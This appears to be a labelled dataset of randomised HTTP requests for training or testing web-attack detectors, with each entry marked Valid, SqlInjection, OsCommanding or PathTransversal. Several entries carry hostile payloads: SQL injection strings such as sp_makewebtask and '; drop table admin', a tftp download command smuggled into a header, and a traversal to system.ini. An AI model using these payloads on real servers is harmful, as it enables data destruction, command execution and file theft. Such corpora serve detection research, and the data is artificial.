Accept-Language: *
Cache-Control: max-stale
Client-ip: 74.65.3.173
Cookie: f0eosBed7= g
Cookie2: $Version="08"
Date: Fri, 07 May 04 12:28:59 CET
ETag: W/"P8rNSL5HVu3tWde"
Expect: eE0kef
From: ibuest@tharmq.fr
If-Modified-Since: Mon, 18 Jun 07 06:30:50 GMT
If-Unmodified-Since: Thu, 08 Feb 07 06:20:35 GMT
If-Match: "Hf2.g-WSYwXVcRLw"
If-None-Match: "UciD0zCslT4vWbW3-"
If-Range: "U3Tlz7TpdKWCpI@CTbQb"
Max-Forwards: 0818
MIME-Version: 8.5
Pragma: tdautse0='zimdE6Is'
Proxy-Authorization: Digest realm
Authorization: Digest opaque="gIrbgdp"
Range: -22,686-,439169-
Referer: /gdpca/tWcBhbw/lanil/esne/m1lirts.mspx
TE: deflate;q=0.8,trailers
Trailer: Max-Forwards
User-Agent: etupeS/9.1.6.0
UA-CPU: Sparc
UA-Disp: 806,0738,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6456x555
Via: 5.5 182.21.250.254
Transfer-Encoding: hape; 7sTapit=ojHast
Upgrade: r7hret/3.9, mve/5.9, oiIbha/2.2, anpn/6.2, voe9h/2.5
Warning: 728 164.233.246.188 "twrTee9rEu95arsato" "Tue, 26 Oct 04 22:26:31 GMT"
X-Forwarded-For: 141.250.177.130
X-Serial-Number: 74489
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 13157
Start - Id: 30018
class: Valid
GET /gnowddtagiDHktstnii3/8l/nincludextermVW/wopenNV1aR/wsies4hd28ms9on/0WfF7Yx9V7FKlK3lF.php4? HTTP/1.0
Host: www.lbiTitoncs.uk
Connection: alIaterd
Accept: */*;q=0.1
Accept-Charset: iso-8859-1;q=0.6, x-mac-icelandic;q=0.2, iso-8859-3, hz-gb-2312;q=0.9
Accept-Encoding: *
Accept-Language: eest-oeNg7, tb-ptru
Cache-Control: no-store
Client-ip: 144.86.229.239
Cookie: een=s6R;Oeadgi=4634646;etEnvcoa=echosa-nok;z1t=3;rrQt2=7437073;ldrDozi7Eatert=34
Cookie2: $Version="72"
Date: Sat, 19 Aug 06 04:06:13 GMT
ETag: W/"BvopIOj24Q2Ts1ddJqx"
Expect: eiokr
From: aeeNsEvt@wbsohnw.st
If-Modified-Since: Thu, 11 Mar 04 22:06:42 CET
If-Unmodified-Since: Wed, 07 Dec 05 22:12:15 CET
If-Match: "T18l6Mfp0dlkdNHKeP"
If-None-Match: *
If-Range: *
Max-Forwards: 310
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: yitanN eiz5i=odeihx
Authorization: Digest response="3E681Ef6c50468ba738d0ba4eb5c9Cdb"
Range: 873888-,-667435,809054-93
Referer: /arshlfmt.asp
TE: deflate;q=0.0,chunked;q=0.0,trailers
Trailer: Accept-Encoding
User-Agent: lxiobYt
UA-CPU: StrongARM
UA-Disp: 6424,6665,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5067x616
Via: aIl3/8.3 42.194.199.35, FTP/8.1 www.yhtNmunt.js:8875, 0.8 6.92.170.174
Transfer-Encoding: identity
Upgrade: xo1itu/7.4, olnwaa/6.2
Warning: 840 www.fmip.htm:1 "ZCdsohe" 
X-Forwarded-For: 23.247.167.67
X-Serial-Number: 2857393
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30018
Start - Id: 14816
class: Valid
GET /sWcMOV/ck7tIcJt1hqwrtQbXsY/bgegwLptaibteewplnth/QtmpSk4@W@/lntl5od3Ytt1i5oesni.exe? HTTP/1.0
Host: www.wditdsona.fr
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: max-age=13849
Client-ip: 237.183.88.12
Cookie: caNN=nuwh;talwrion48eots=itMzvno;uW5n2Be=eit;Chwramee=/opt2i
Cookie2: $Version="935"
Date: Mon, 21 Mar 05 18:05:30 UTC
ETag: "@YJbQ6omN6hSwxhW"
Expect: 100-continue
From: nOeesl@pemet.it
If-Modified-Since: Tue, 09 Mar 10 09:39:09 GMT
If-Unmodified-Since: Wed, 18 Mar 09 23:26:03 UTC
If-Match: *
If-None-Match: "Wi2@zuqsM7Tx3nL"
If-Range: ".jMEGjbQlXholOpa-Og"
Max-Forwards: 388
MIME-Version: 6.9
Pragma: 2vti=eqtCpt
Proxy-Authorization: gresSi t3uet=opnt
Authorization: Digest username="7Eale3e"
Range: 846913-
Referer: http://33brR.org/4Otdsbe.js
TE: trailers,trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.4 (X11; U; Linux i386 6.6; qe-uO; rv:6.8.8) Gecko/07083647
UA-CPU: MIPS
UA-Disp: 1041,483,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1451x6345
Via: FTP/2.1 www.insdi0dv.js
Transfer-Encoding: compress
Upgrade: altl/2.2
Warning: 387 165.171.90.131 "hiaiten8hm8" 
X-Forwarded-For: 220.203.31.112
X-Serial-Number: 48297447626041948628
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14816
Start - Id: 41140
class: SqlInjection
GET /sn1ThtnCtf8soeAn/A3EunionQ8XAP2p3h/7R/slAripgteslHo/smtnyAlai4ue.msf?XcmD3idecAa6ti=ttmp+r&mio9w=l%3C+ut&0aUxP4ao8xj.=fdxrur7kl2nrdnEdt&co5eet0sItvxa=%27%3B++++EXEC++master.dbo.sp_makewebtask++++%27c%3A%5Cinetpub%5Cwwwroot%5Csi.htm%27%2C+%27SELECT+++osqrE++++FROM+++++oaaueuf++++WHERE++++xtype%3D%27%27U%27%27%27&kcqtk20eAdOsiq=6&etuOfwwo=oRVb0&Rweasn1ehu=ew7tthu2&aa=sS44u&wllocTnbctoe=fehaeocIets&TRhotgnnokaje4=1&7wyptrgge=iermsm%3Bsesn%29+intu+ii&nBoyera=pcorUEvdtU HTTP/1.1
Host: 77.253.129.53:51
Connection: tlQea
Accept: application/*
Accept-Charset: x-mac-arabic;q=0.4
Accept-Encoding: 
Accept-Language: 35ceesm-esmteota;q=0.2, fmsO-ydo;q=0.2, l9Oi7-feIe;q=0.4, dta-L, t2h-hiosg;q=0.1
Cache-Control: no-transform
Client-ip: 1.110.214.117
Cookie: gNhCqt2divshutdownVDO=ne5eaia5is6ricyr;tfssdniewbeg=ees(g eval/r;zyF1sm1J7=reelA\n;tu=Mre;lhRmm=sS84pn;b5b0TUat=gnxAOJrt8
Cookie2: $Version="173"
Date: Mon, 02 Oct 06 15:32:05 GMT
ETag: "3gWmZjep6Aga7L5S"
Expect: 100-continue
From: r3rduu0D@aEtfemeowc.cz
If-Modified-Since: Sat, 16 May 09 09:48:14 UTC
If-Unmodified-Since: Thu, 21 May 09 06:50:01 CET
If-Match: "@OvZOKpmLqwcNPhkkJu"
If-None-Match: *
If-Range: *
Max-Forwards: 57
MIME-Version: 7.8
Pragma: drcar='5lizntie'
Proxy-Authorization: Basic dDlsN2UzOnJnZWUyZQ==
Authorization: Basic bWlydGw6U2VzczNpdGg=
Range: 9-668228,-687
Referer: http://qpEn.it/grt0e/wetadipr/yhhep/minh/aDeg.php3
TE: gzip;q=0.4
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.4 (compatible; Konqueror/9.6; Linux i386; lu3w3arC; hutbuso)
UA-CPU: Sparc
UA-Disp: 952,1268,32
UA-OS: FreeBSD
UA-Color: color16
Via: 0.5 www.rSsaagb.gif
Transfer-Encoding: identity
Upgrade: ng6s/4.8, 4et/8.2
Warning: 458 www.anke2uT.gif "btsiteht9hIieeLwah" 
X-Forwarded-For: 169.105.19.193
X-Serial-Number: 200032143188636
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41140
Start - Id: 2047
class: Valid
GET /eWmugzM0aZwIK/mIg@JAUii7Y9z4-D/mqnyomawokJitPien/pisvenhncGht/m4B6iframetATTL2S2a/tNns/tteeavljlloaryladheI/sapr5tahh.mspx?tscwemwega=212&n86nyn2Twlr=542 HTTP/1.0
Host: 41.69.21.202
Connection: 5ucStia
Accept: */*
Accept-Charset: windows-874, euc-kr;q=0.3, macintosh;q=0.5, iso-2022-kr;q=0.3, iso-8859-15
Accept-Encoding: deflate;q=0.3, gzip;q=0.4
Accept-Language: wrhnfreo-sU;q=0.4, acghsQo-i;q=0.6, rde0sq8-ltkOlel1, lrii-s
Cache-Control: colIki=qdvOgtge
Client-ip: 19.209.8.153
Cookie: 5uwhere6GT=75613897;dN9Dasrre=8228
Cookie2: $Version="423"
Date: Tue, 24 Feb 04 22:02:41 UTC
ETag: "MMjhxV02xzZUJmdm9eYH"
Expect: riad
From: occ0efi@8ll4r48z.be
If-Modified-Since: Thu, 25 Aug 05 15:00:13 GMT
If-Unmodified-Since: Thu, 01 Oct 09 11:29:56 UTC
If-Match: "Fj823QwW35cdj_86VqIb"
If-None-Match: *
If-Range: Fri, 01 Apr 05 07:45:54 GMT
Max-Forwards: 845
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: sgUhr eKit=0iDeacaT
Authorization: Basic aDA0ZWV6azptZW50Y3Q=
Range: -586766,7072-,732551-
Referer: http://yowc.be/4nNd/kLPjawhl.asp
TE: trailers
Trailer: Date
User-Agent: aIx8ORdyy http://www.cfd8.it
UA-CPU: PowerPC
UA-Disp: 5129,6449,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 8738x825
Via: joiaf/9.2 245.55.245.67:736, FTP/3.1 31.11.27.109, zdb/3.0 121.192.91.175
Transfer-Encoding: gzip
Upgrade: l0e/3.9, r2qtn/3.5, ewhpe/0.7
Warning: 517 www.ga29eer.tiff "dl7koePensh3m" "Mon, 01 Aug 05 08:22:34 UTC"
X-Forwarded-For: 18.100.221.44
X-Serial-Number: 9493584291760843409
----: ------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 2047
Start - Id: 8385
class: Valid
GET /nor7E66/9l6/Zl2Z/Coee5sefoo7ayfbShar/NxwA/sT/o6m3rLUrD2o2/b2rqP/oJgEfWT/ZfOCaGXMrwPt/lEvILMxovy.a@a5SVDcC/rrQSsuWxrkL.htm?le=admingeo7nhomej%3Er5dtii&s9hpanpiec=84986993&Popaeenhtdhed=u6+&xoaNnIthee9=rpIa3G3vMt.o HTTP/1.1
Host: 143.167.55.184
Connection: bhsonsi
Accept: application/zip;q=0.0, image/*;q=0.4, image/*
Accept-Charset: x-mac-hebrew;q=0.7, iso-10646-ucs-2;q=0.7, iso-8859-5;q=0.5
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: no-cache
Client-ip: 186.143.75.67
Cookie: gKservices3Cy=1418;JhwuL9=nsot-
Cookie2: $Version="05"
Date: Fri, 06 Apr 07 01:51:59 CET
ETag: "3jaqTACFujJ6duM"
Expect: untOhhii=htmg
From: erpa3@smdtCgnon.be
If-Modified-Since: Thu, 05 Feb 04 08:05:54 GMT
If-Unmodified-Since: Mon, 10 Oct 05 09:23:26 GMT
If-Match: *
If-None-Match: "O-xxiZn9wwwifGvlf."
If-Range: Wed, 05 Sep 07 20:57:27 GMT
Max-Forwards: 77
MIME-Version: 9.5
Pragma: LvoYhn=R
Proxy-Authorization: Basic ZGtjczplWWNuZHRmRA==
Authorization: Digest nonce
Range: 994131-66069
Referer: http://www.u1tcl.st/nsaateZi.css
TE: deflate;q=0.3,deflate;q=0.0,gzip;q=0.8
Trailer: Warning
User-Agent: Mozilla/5.2 (compatible; ieip; Open BSD i586; sntixhrp; efiqip)
UA-CPU: PowerPC
UA-Disp: 283,560,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 4723x390
Via: FTP/5.6 www.5nrr.gif
Transfer-Encoding: deflate
Upgrade: o1iL/4.6
Warning: 051 142.192.100.17 "aDe4she" 
X-Forwarded-For: 240.233.176.16
X-Serial-Number: 4380608
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8385
Start - Id: 43610
class: OsCommanding
POST /r1Sd6AOHjMPCCFzALyid/Py/2Fkceonc/eG9uVjYUdS.iPcSN4I/iQ4VzqWTKMkiB@MJY/tU9p2BBnEcxHmilGROLx/kVro5caUwsrhakb/te6K9y2.ikNb1FthSdD/PscriptSEBJ.msf? HTTP/1.1
Content-Length: 253
Content-Language: oegvschs,eaa,iv
Content-Encoding: compress
Content-Location: /zsrdmnEi/mo3hab9l/ieggx.pl
Content-MD5: MXNwYXZnbXJnc2Vhdzdubw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 29 Oct 06 02:02:00 UTC
Last-Modified: Mon, 03 Dec 07 17:49:16 CET
Host: 249.157.51.245
Connection: close
Accept: image/jpeg;q=0.5, audio/*;q=0.5, image/png;q=0.5
Accept-Charset: *;q=0.9
Accept-Encoding: \nuftp -p     www.meisni.com    /tierns/stll/oltoil/inra/arns/trenll
Accept-Language: *;q=0.9
Cache-Control: max-stale
Cookie: bom3=575;ingepFmtzotiOd=4psystemdt;sdtc2y=43Q5
Cookie2: $Version="5"
Date: Wed, 11 Aug 04 04:36:25 CET
ETag: W/"xa95_w0Wlj3Xi2ojD"
Expect: sii0tlh=i1nei1yi;qiyd3=hitetaby
If-Unmodified-Since: Sun, 05 Dec 04 11:28:02 CET
If-Match: "yVTg.Ru-95nEg42"
If-None-Match: *
If-Range: Thu, 28 Dec 06 07:45:19 UTC
Max-Forwards: 924
MIME-Version: 4.4
Authorization: NTLM bk1yZGVla2hoa3J2cGN5ZGxCZWVtVW1FZWFsemk2VGZsZ3JTYnVoYUw=
Range: 29587-,-5463,921-
Referer: /Aotiire/twmjte/lljmsb/bmut.tar.gz
User-Agent: Mozilla/3.5 (Windows; U; Windows NT 9.8; ni-ed; rv:7.8.6) Gecko/60945823
UA-CPU: 68000
UA-Pixels: 6552x5468
Via: 5.7 61.97.85.202:8747, 3.3 www.seom.js, 9.2 175.188.218.100
Transfer-Encoding: compress
X-Forwarded-For: 1.73.97.53
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

eG3thnteev=ntar-l9+eveterE&iae4ssoee=UzmLs iframe;(i&vyoeccsgdrapxe=swindow.open8N4S<tinodex&2ez7xn0q4=8310793&ySAEHte2hkmhl=jdodtmEeIerep&eeebrh7e=8706900&o2r04ee=173&dsscEeifcph=o5deehsfanndDsIe&L9vB4=pSN&Hsgrt=wA8ZdRkpLMKn&seF5c9vnaiu=5868013

End - Id: 43610
Start - Id: 8505
class: Valid
GET /c0ZMHLcoAQwB5dUlyBT/0_/Ef5rXZc/lKV6_p.shtml?e2cneh=eek&iuaN=y6he9b5+yuT+a&tisniiie=84859&d0nz=p4vhWHdAO&m2tsTwtpZenael=087568&uxdtssfe=71 HTTP/1.0
Host: www.olsee.cz
Connection: ietsi
Accept: */*
Accept-Charset: iso-8859-7, hz-gb-2312;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 118.234.207.145
Cookie: nnNvnuNbsUt=1;hrorwnlD=nhtls7ahn;9ulhKofl4eep=stern1;alvstehfqernego=samare4jElddh4?ahesm&;eeejhnmbeaea=19
Cookie2: $Version="14"
Date: Mon, 08 May 06 16:36:15 UTC
ETag: W/"d5PVrDJeSevzvD1WQRu"
Expect: 100-continue
From: esnowat@SliNzma.gov
If-Modified-Since: Sat, 10 Jan 09 23:57:12 UTC
If-Unmodified-Since: Wed, 29 Jun 05 14:17:35 GMT
If-Match: "6tUpaNFDg0ywpoAou2"
If-None-Match: *
If-Range: Sat, 28 Feb 09 21:52:57 UTC
Max-Forwards: 5484
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest username="acgtn"
Authorization: Digest cnonce="eehiq"
Range: 288-033,80242-026
Referer: http://istdsht2.gov/dNturi/1ycphm/mekaNn.php4
TE: chunked;q=0.4,chunked;q=0.9,trailers
Trailer: Authorization
User-Agent: Mozilla/6.9 (Windows; U; Windows NT 1.5; aO-na; rv:3.0.3) Gecko/75258398
UA-CPU: 68000
UA-Disp: 7723,577,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6704x1260
Via: 7.7 www.lSteyJ.jpg
Transfer-Encoding: gzip
Upgrade: Rkttt/8.8, r9on/0.9, pnI/3.5
Warning: 054 220.48.171.98 "iEbptnlss" "Sun, 08 Mar 09 01:03:10 CET"
X-Forwarded-For: 249.204.156.98
X-Serial-Number: 116122935
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8505
Start - Id: 42744
class: SqlInjection
POST /JA38in7t6x_I8EV/ieeporxtgwdSenkh/u3-hnDd_sey5S/yPKMaEn_OByoe/ea7frw/ogGgMUx6PVRS-/vm8eDHpnieeu6dsitir/srswdeleteqbetweenKy/fv-mfIV_ZN/7mBtmmlQidqg_a/o84o1mawlNmeirerani6.jpg? HTTP/1.0
Content-Length: 159
Content-Language: r7k
Content-Encoding: gzip
Content-Location: /oXarh/1eeseh/mdsddn/imodi.asmx
Content-MD5: d2dhcmRkc2FuMGdhZHR0Yw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 04 Feb 05 02:31:31 CET
Last-Modified: Sat, 29 May 04 07:21:46 CET
Host: 196.14.40.71
Connection: keep-alive
Accept: audio/*, image/*, image/gif
Accept-Charset: iso-10646-ucs-2
Accept-Encoding: compress;q=0.4
Accept-Language: teeeqbt-gwet;q=0.7
Cache-Control: min-fresh=74062
Client-ip: 192.131.233.93
Cookie: idGlocation7...7rOH=81;trm3t=oilg;se1p2oWd1oh='; drop     table  admin
Cookie2: $Version="1"
Date: Thu, 04 Jan 07 16:01:57 CET
ETag: W/"5DjfBehqhBtt9WGZf"
Expect: 100-continue
From: olec@itnahevEod.st
If-Modified-Since: Tue, 14 Sep 04 14:33:51 UTC
If-Unmodified-Since: Fri, 01 Jun 07 07:41:41 UTC
If-Match: *
If-None-Match: *
If-Range: "LDizqBP-DeE.0Cg"
Max-Forwards: 125
MIME-Version: 2.2
Pragma: wrtbs='1rbe'
Proxy-Authorization: npee tari=stsHdd
Authorization: m1ceo tonewc=eEbr3mea
Range: 393-,35701-,-917891
Referer: http://Rnesme.net/5atow/sayenei/8no6eao/svl5ael.avi
TE: deflate;q=0.3
Trailer: Accept-Encoding
User-Agent: perrNim6bn/2.0.8.4.0
UA-CPU: MIPS
UA-Disp: 430,3561,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 957x8790
Via: 2.1 182.26.60.194, HTTP/3.0 109.161.167.100, HTTP/5.9 www.snxeewss.jpg
Transfer-Encoding: rak5rs; ttaar=msnnid
Upgrade: sbhNet/1.5
Warning: 415 232.249.165.198 "arT5ysi393n73z1tharq" 
X-Forwarded-For: 133.180.69.1
X-Serial-Number: 40137446111101
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

99a7Ieiit=4ge&oit=snsm>F2cmul&Ientlt5e1oD7=rd&M2W2Khmocha=epmcatoinEednn&izwrlear=70&pCiELZFc=4_fl4uJBdL&QRfalmu=QGsf8&leeeo5bs=48209909&phcinsLidoe=45525433

End - Id: 42744
Start - Id: 42351
class: SqlInjection
GET /1z3/orNaabuehhroewcd6/odQw38BvFbT.EhOZ/eSonrarjNkfeweu/u@i8kVyUdRFiHjSH/LyAbu/sS3F@/hadeseKEjs/t-cKCfqyDiWswj0zuC@A/taoghAsdhea6j8e/pgroup byeLjs.js?saegnwr=nRjbC&ia=%27+AND+USER_NAME%28%29%3D%273w3zu&anw3e3ueenmIash=zn6ts&M@AandE=3&eal=ta9vwdeR&laJfAc8rKp=%5Ddhrl&eetih6oopq=evTHc HTTP/1.1
Host: 229.254.86.42:6
Connection: hciTor
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=7
Client-ip: 67.128.206.20
Cookie: Iol=1W24U_abq-q4;m8a=iTQxbYUmQup;Lace=921667
Cookie2: $Version="85"
Date: Mon, 06 Feb 06 03:39:27 CET
ETag: "cE7xvsfNLwIKkRtDqb"
Expect: hoioeia=Artttt;msuR6sft=Rec7diI
From: ttyr@nt7thnt6um.uk
If-Modified-Since: Thu, 19 Apr 07 23:00:35 UTC
If-Unmodified-Since: Fri, 18 Jun 04 09:17:23 UTC
If-Match: "R2hLv5HkJq9lWGU3qS"
If-None-Match: "f-1U4MQ5PQ4AqgK"
If-Range: Sat, 19 Apr 08 21:50:25 GMT
Max-Forwards: 5149
MIME-Version: 5.2
Pragma: nllcigJd=tehts9t
Proxy-Authorization: Basic aGlzbGlvZTpyRVU0c3IwMQ==
Authorization: Basic cXJlcjp3czBzYw==
Range: -42018,-510767
Referer: http://eycaI.de/9Der3te/oEchejmi/razua.pdf
TE: gzip,trailers
Trailer: Proxy-Authorization
User-Agent: nh8fIC http://www.Ytlior.it
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 999x243
Via: 6.5 www.srTHo.jpeg
Transfer-Encoding: identity
Upgrade: aia9y/5.8, shfr/4.4, ssoa/6.4
Warning: 478 44.68.67.163:8 "haHdehmpgh" 
X-Forwarded-For: 171.143.1.2
X-Serial-Number: 71261
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42351
Start - Id: 14522
class: Valid
GET /wF/axwRkvbA@r1IUgt5Fd/ewdoddeoeO/0suiskraef/etmasattUrint0htert.gif?rrdshms5dmy=eoes&z7s740Rdjrs=%28g%40s&8Sgto0=r-q0KH HTTP/1.0
Host: www.wmm3snh.cz
Connection: 1eaele
Accept: audio/*;q=0.3, application/rtf;q=0.2
Accept-Charset: cp-936;q=0.5, x-mac-japanese;q=0.6, iso-2022-jp;q=0.5
Accept-Encoding: 
Accept-Language: nnfq7TOn-pvlj4;q=0.3, iftna-foGteyoA, ftuswpg-y
Cache-Control: only-if-cached
Client-ip: 119.245.171.52
Cookie: nitiddih=e1G3gnlQ;l0oonm=\t5raau)Htelnetd;hsoneigerw=n2L12dNwa;r58svd8yaeSao=7E@8BA7@
Cookie2: $Version="80"
Date: Wed, 01 Sep 04 13:14:33 GMT
ETag: "rRmqwhf@rbp5lVhHR"
Expect: 100-continue
From: ateo@totu.fr
If-Modified-Since: Mon, 19 Jul 04 13:20:31 GMT
If-Unmodified-Since: Wed, 19 Mar 08 02:35:59 CET
If-Match: "RawPmoHPisvcXME"
If-None-Match: "G_j74Q.2qs7Cyq1307"
If-Range: *
Max-Forwards: 581
MIME-Version: 2.8
Pragma: tnhbxa=wtsao
Proxy-Authorization: Digest algorithm=MD5
Authorization: hyla8 cehe=cegetee
Range: 4019-22,-23,269-5
Referer: /cdxtr.cgi
TE: deflate;q=0.7,gzip
Trailer: Expect
User-Agent: dededTj8meOaot
UA-CPU: x86
UA-Disp: 866,9515,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 3486x145
Via: aSpl/8.4 77.178.183.141
Transfer-Encoding: tsyniR; mhnio=renoEa
Upgrade: deoC/9.0, lnte1/6.7
Warning: 286 www.onba2h.tiff "okewrt0tac" "Sun, 08 May 05 11:09:41 GMT"
X-Forwarded-For: 129.8.69.87
X-Serial-Number: 01337
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14522
Start - Id: 6199
class: Valid
POST /ndtc.cfm? HTTP/1.0
Content-Length: 99
Content-Language: sjkMne,azewmei,i
Content-Encoding: compress
Content-Location: /tbSr/e7alr/aegu6cE/em9oataR.swf
Content-MD5: T2hzd2hlb2Vvcnp1bmV3Zw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 02 Aug 07 23:42:53 CET
Last-Modified: Wed, 20 Jun 07 02:13:26 UTC
Host: www.Mr24.uk
Connection: tojol
Accept: */*
Accept-Charset: iso-2022-kr, koi8-r
Accept-Encoding: 
Accept-Language: r9e-o;q=0.0, c5scaag-eeser, sh7r-iwuCo, 2ne-le8;q=0.7
Cache-Control: g5d='iTygg'
Client-ip: 103.234.157.227
Cookie: 0rIsweeh=413057307;sntn=l8TmXAtWy4;tjxa=onilEtfmtnelt17l
Cookie2: $Version="599"
Date: Mon, 17 Nov 08 08:56:53 GMT
ETag: "9wsLqi1.xscmr@y"
Expect: 100-continue
From: 9gene@c1isinsH.it
If-Modified-Since: Thu, 10 Jun 04 21:16:34 GMT
If-Unmodified-Since: Tue, 11 Dec 07 19:32:16 UTC
If-Match: *
If-None-Match: "OPkR@_JLODxSP.EaDkJ"
If-Range: "tViBSmP0jid_rWYr"
Max-Forwards: 998
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: scna hsfne=kittdaRt
Authorization: Basic ZXdlVDRlcTpuaHVlZDl2bg==
Range: -5,3240-807740
Referer: http://nqahURm.net/Jetr0ppt/agrbaett/nretpc/nribRhtr/NaOo.pl
TE: deflate,trailers,gzip;q=0.4
Trailer: Via
User-Agent: Mozilla/8.1 (compatible; Konqueror/5.6; Linux i586; nxnidtieng; ib8mEryruw)
UA-CPU: 68000
UA-Disp: 717,319,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 230x8850
Via: FTP/0.3 www.2irCey.jpg:04923
Transfer-Encoding: deflate
Upgrade: sds/2.6, greioh/9.0
Warning: 119 www.ltwgnl.js "ojeestbo" 
X-Forwarded-For: 27.53.52.203
X-Serial-Number: 1402347100773989
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Sinti=E&dsEredne0kE=eyi6&9attmoi=y&2iseycdtohut=en1cza1g1&hel=7828&_passthru1sUSqtDHO=ebe1asnhpleah

End - Id: 6199
Start - Id: 45434
class: PathTransversal
POST /IlocationZ57M.x@TeM/4AJwget/ge1onm8nfiyneufmEad/0Ss2iejmjtTiana6/2a/biFjMhz0-lRNh@Mu_kE-/ae0ei/hehexsaamG/peeo.pl? HTTP/1.0
Content-Length: 170
Content-Language: emgf
Content-Encoding: compress
Content-Location: /aesedr.php3
Content-MD5: bmJDc3JucW1zaGgxOGhCbw==
Content-Type: application/x-www-form-urlencoded
Host: 99.160.160.81
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, gzip
Accept-Language: *
Cache-Control: no-cache
Cookie: sai=Ka5iO6cGe;ty8xNapWn1Ecs=oa;mL8N=0102;sluf=cuyi ;aNiBeyk8a=ntolles0eg;mcqmae4=zepLythus
Date: Sat, 02 Jun 07 08:17:40 CET
ETag: "oZohpkEeVQezwfEkAp8"
Expect: 100-continue
If-Unmodified-Since: Tue, 25 Dec 07 20:02:26 UTC
If-None-Match: *
Max-Forwards: 4382
Referer: http://www.ks1g69ea.de/dgtgov/oerfApz/eXbu/tniidd.swf
User-Agent: loiner0/9.1.1.3.6
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aau1eaeglfe1tr=thu&efsto0a1cneevbu=mhwJ8.f-4v5X&FAye=21&mblJse7oi1q=t)cL0pocbfrom4cnni<o&prosnp=xOqej3Ot7SM&t1TorN=ooo2iehtgETfoo&tl6hODtdwaee=\WINDOWS\system.ini

End - Id: 45434
Start - Id: 7691
class: Valid
POST /r_trwLZ8xV_IAJj7qzN/s5_O@qA5YzE@7UH/cSp96NQ3S/ei6OnaeA/r5ti44Pef6dItAe/Dc@execJNQJ/e2.8GgLMs0aSI06TEp2/WadtmoonayEo.bin? HTTP/1.1
Content-Length: 48
Content-Language: aht,rbbob
Content-Encoding: compress
Content-Location: /otfwe/emtirnA/jsneo/ebTa/trnblo.tar
Content-MD5: aGlUYUFobzJldDBsaGRtZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 09 Apr 10 12:35:43 CET
Last-Modified: Tue, 13 Mar 07 04:51:00 UTC
Host: 165.119.114.28
Connection: tdne
Accept: application/*;q=0.3, image/*, application/rtf;q=0.8
Accept-Charset: windows-874;q=0.9, windows-874;q=0.3
Accept-Encoding: deflate;q=0.2, identity, identity;q=0.2
Accept-Language: tsnlu-gmrml;q=0.2, ed-o;q=0.4, O-oInMee;q=0.5, rsMozne-dseGsa, 5-ee
Cache-Control: max-age=805
Client-ip: 64.120.128.79
Cookie: IF4AJTk9V=1048;ys=f updateaahb;unrvDysfeteIu0=o ~leinEplaTe
Cookie2: $Version="6"
Date: Sun, 02 May 10 12:39:24 CET
ETag: "Yyea6Aa1SS6qTQSBPHH4"
Expect: 100-continue
From: hniei7@Uuezhotro.it
If-Modified-Since: Sat, 27 Jan 07 05:10:00 CET
If-Unmodified-Since: Tue, 07 Sep 04 18:27:42 GMT
If-Match: "crKu6ggH6eNNX@SNBl"
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 4.9
Pragma: o=Ate5o
Proxy-Authorization: Basic cGllYWc6eHBvbmw=
Authorization: xU5clm trnrma=radL1
Range: 62-,-281
Referer: http://www.bjrehi0.de/ioFm1/bvfeeu9/dxseoi/enleui.dll
TE: trailers
Trailer: Cache-Control
User-Agent: xeIfznie/1.7.7
UA-CPU: Sparc
UA-Disp: 1607,8813,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 592x583
Via: HTTP/0.4 www.dfene6e6.tiff:344, 7.8 www.iiId1a.css
Transfer-Encoding: qftfe
Upgrade: hOeos/1.6
Warning: 199 www.oi0qe4a.jpg "lraikclebtlEioaNy3" 
X-Forwarded-For: 49.121.77.5
X-Serial-Number: 5287621951731
----: ----------
